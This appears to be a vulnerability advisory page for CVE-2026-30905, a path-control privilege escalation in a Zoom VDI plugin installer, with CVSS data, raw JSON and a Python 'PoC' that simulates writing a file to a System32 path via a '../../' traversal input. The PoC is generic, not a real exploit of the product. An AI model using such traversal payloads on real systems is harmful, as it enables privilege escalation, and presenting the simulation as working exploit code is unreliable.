Security Vulnerability Report
CVE-2026-30905 CVSS 7.8 HIGH

CVE-2026-30905

Published: 2026-05-13 19:17:05
Last Modified: 2026-05-14 18:15:05

Description

External Control of File Name or Path in the Zoom Workplace VDI Plugin Windows Universal Installer before version 6.6.11 may allow an authenticated user to conduct an escalation of privilege via local access.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Zoom Workplace VDI Plugin Windows Universal Installer < 6.6.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept for External Control of File Name or Path
# This script demonstrates how an unvalidated path could lead to privilege escalation.
# Note: This is a simulation for educational purposes.
import os


def vulnerable_installer_component(user_input_path):
    # Simulating a vulnerable function that does not validate the path
    # In the real scenario, this might be part of an installer running with high privileges
    try:
        # The vulnerability allows writing to arbitrary paths controlled by the user
        full_path = os.path.abspath(user_input_path)
        print(f"[*] Attempting to write to: {full_path}")
        with open(full_path, 'w') as f:
            # Writing malicious content (e.g., a DLL or configuration)
            f.write("MALICIOUS_PAYLOAD_CONTENT")
        print(f"[+] Success! File written to {full_path}")
        print("[+] Privilege escalation potential achieved if path was in a protected system directory.")
    except Exception as e:
        print(f"[-] Error: {e}")


# Attack Scenario: Attacker provides a path to a system directory
# Using relative path traversal to escape the intended installation directory
malicious_input = "../../Windows/System32/evil_hijack.dll"
vulnerable_installer_component(malicious_input)

References

https://www.zoom.com/en/trust/security-bulletin/zsb-26007

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30905", "sourceIdentifier": "[email protected]", "published": "2026-05-13T19:17:05.367", "lastModified": "2026-05-14T18:15:05.433", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "External Control of File Name or Path in the Zoom Workplace VDI Plugin Windows Universal Installer before version 6.6.11 may allow an authenticated user to conduct an escalation of privilege via local access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-26007", "source": "[email protected]"}]}}